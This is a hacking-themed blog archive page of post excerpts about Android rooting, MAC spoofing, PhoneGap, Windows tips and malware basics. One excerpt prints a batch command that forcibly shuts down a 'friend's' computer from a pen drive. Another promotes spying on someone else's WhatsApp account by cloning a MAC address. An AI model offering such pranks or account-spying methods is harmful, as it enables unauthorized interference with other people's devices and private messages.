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Showing posts from February, 2015

Top Tips to Make Money with Google AdSense

Everything You Need To Know about the The Custom ROMs For Android Smartphones And Tablets

Welcome to Crack O World’s Android ROMs section. In this section you will find the top custom ROMs for Android smartphones and tablets, as well as learn how to install/flash your Android smartphone or tablet with these custom ROMs. Note #1: Your Android smartphone or tablet needs to be rooted in order to install/flash custom ROMs. Visit Crack O World’s How To Root section for all your rooting how to’s, tutorials and guides! Note #2: We will be updating the Android ROMs page with the latest custom ROMs, how to install/flash guides, tutorials and how to’s once available, so make sure you come back soon!

How To Root Android Smartphones, Tablets And Much More: Everything You Need To Know!

Welcome to How To Root section. In this section you will learn how to root your Android smartphone, tablets and much more! First however, we will cover briefly what rooting is and why you should root your Android device. Note #1: If your Android smartphone or tablet is already rooted and you’re looking for how to spice it up and make it stand out from the crowd, visit Crack O World's Android ROM section. Note #2: We will be updating this page with the latest how to root guides, tutorials and how to’s once available, so make sure you come back soon! The Basics Of  Rooting Are you unsure about Rooting? Scared it might cause irreversible damage to your device? Well, all your questions will be answered in this detailed analysis.

How To Spoof MAC Address in Android

This is a HOW TO about how to spoof your MAC address. A MAC address is a combination of numbers and letters that are unique to your own WiFi card. I am not responsible for how you use this, I am just putting it out here. Don't flood this thread with how it is illegal because there are legal uses for this (such as pen testing). First, you need to download a free app called Android Terminal Emulator. It is free and works on the Incredible. You do not need root for this to work. To change back to your normal MAC Address, just follow these steps to change it back or restart your phone. It makes this easier if you already know your real MAC Address which can be found at: All Programs > Settings > Wireless & Networks > WiFi Settings > Menu button > Advanced  Keep this in

How To Spy On Someone Else WhatsApp Account From Your Android

WhatsApp is now part and parcel of everybody’s life. Whether it’s you or me, no one can spend even few hours without using this amazing instant messaging client. Apart from live chat, mesmerising features like sharing media and other data are key features that allows WhatsApp to hold number of users with it. Although everything is quite handy in WhatsApp, but there’s a small security loop hole that will allow you to access someone else WhatsApp account. Each WhatsApp account is associated with unique MAC(Media access control) address. If any one changes his/her device(MAC address also changes), they are requested to re-verify their WhatsApp account. Means you cannot access same WhatsApp account from two devices. But what if you got success in having same MAC address for two devices? You can certainly access same WhatsApp ID from two devices that will

PhoneGap's new Device Wall

The Device Wall was born from a simple question: How can we create a test lab for past, current, and future mobile device technology? From this question sprang the Device Wall. Its physical platform provides Adobe's Vancouver office an armature to archive phones, tablets and hybrid mobile devices that come in for testing. It creates a dynamic testing site within the office space where, through its back-end infrastructure, up to 100 devices are simultaneously synced, charged, and tested directly on the wall. The Device Wall creates a unique lab space in the office where Adobe’s software developers can now test their cross-platform technologies in front of clients, guests or colleagues.

PhoneGap Beliefs, Goals, and Philosophy

This article seeks to clear up misunderstandings about the goals of PhoneGap. Our goals are wrought from our beliefs, and development philosophy. Understanding a free software project, like PhoneGap, requires more than knowledge of the implementation details. It requires understanding the individuals behind the code. Knowing the people and what motivates them inform you more about whether the technology is right for you, your goals, and the people you work with. The world is diverse and very often this comes across in our code, and the tools we use to write it. Background PhoneGap was born at Nitobi Software in the summer of 2008. Nitobi was very much a web

What is PhoneGap?

Are you brand new to PhoneGap? Where do you start? What about PhoneGap Build? There are a ton of resources out there and I've pulled it all together to help you get started, get some tips, and figure out where to get help. PhoneGap Intro PhoneGap is a free and open source framework that allows

PhoneGap Explained Visually

I’ve been “out and about” lately, attending tech conferences, meetup groups, and meeting with developers in their offices, and I am getting great feedback on mobile development and PhoneGap. There are some common questions that I am often asked, and I hope this post helps everyone understand PhoneGap better. PhoneGap Before I go too far, let me attempt to clearly state what PhoneGap is… PhoneGap is an application container technology that allows you to create natively-installed applications for mobile devices using HTML, CSS, and JavaScript.   The core engine for PhoneGap is also 100% open source, under the Apache Cordova project.  You can read more about PhoneGap under my “ What is PhoneGap? ” & Other Common Questions post.

Hack Friend's Computer using Pen-drive.

Step 1: Copy this  code into notepad:  @echo off shutdown -s -t 00 Save as besthacking.bat extension (for eg: besthacking.bat).  Step 2:   Now open the notepad and copy this code: 

How To Disable Autorun in Windows 7.

Whenever you connect a removable media to your computer, the autorun feature of Windows 7 comes into action and immediately provides you with many options including the ‘ Open folder to view files ’ option. Apart from the internet, most viruses and malware enter the system through infected removable media.  Malicious programs malware and viruses usually infects the Autorun.inf file present on the removable media device. If you happen to connect an infected removable media device like USB to your computer and then make use of the ‘ Open folder to view files ’ option, the malware will get activated and thereby attack all the files of your system.  The only way to deal with this problem is to disable the Autorun feature of Windows. Here are the steps on how to disable Autorun in Windows 7:

What is Malware And How to Prevent It?

Malware is an abbreviated term meaning “ malicious software ”. This is software that is specifically designed to gain access or damage a computer without the knowledge of the owner.  There are various types of malware including spyware , keyloggers , true viruses , worms , or any type of malicious code that infiltrates a computer.  Generally, software is considered malware based on the intent of the creator rather than its actual features. Malware creation is on the rise due to the sheer volume of new types created daily and the lure of money that can be made through organized internet crime. Malware was originally created as experiments and pranks, but eventually led to vandalism and destruction of targeted machines.  Today, much of malware is created for profit through forced advertising ( adware ), stealing sensitive information

Windows 8 Guide: Shortcuts and Tricks

Dear Crack O World readers today I am going to tell you  Best Shortcuts and Tricks Windows 8 -------------------------------------------------------------------------------------------------------------------------- Tiles: shortcuts to all or any your apps -------------------------------------------------------------------------------------------------------------------------- New full-screen Windows 8 apps (a.k.a. tube apps from the Windows App Store) and desktop apps all have shortcuts here. to inform the distinction between them: the Windows Store apps area unit tailored, colourful tiles, whereas the quality desktop apps ( e.g., Windows Explorer ) simply have a clear generic style utilized by each alternative commonplace desktop app. To manage these tiles on the beginning screen: Right-click,

Simple Steps To Become A Grate Hacker

Hacking is an engaging field but it is surely not easy. To become a hacker one has to have an attitude and curiosity of learning and adapting new skills. You must have a deep knowledge of computer systems, programming languages, operating systems and the journey of learning goes on and on.  Some people  think that a hacker is always a criminal and do illegal activities but they are wrong. Actually many big companies hire hackers to protect their systems and information and are highly paid. We have prepared a list of some  most important  steps necessary to become a good hacker, have a deeper look

Hacker Can Remotely Install Malware App To Your Android Device.

Security researchers have warned of a pair of vulnerabilities in the Google Play Store that could allow cyber crooks to install and launch malicious applications remotely  on Android devices. Tod Beardsley, technical lead for the  Metasploit Framework  at Rapid7 warns that an X-Frame-Options (XFO) vulnerability – when combined with a recent Android WebView (Jelly Bean) flaw – creates a way for hackers to quietly install any arbitrary app from the Play store onto victims’ device even without the users consent.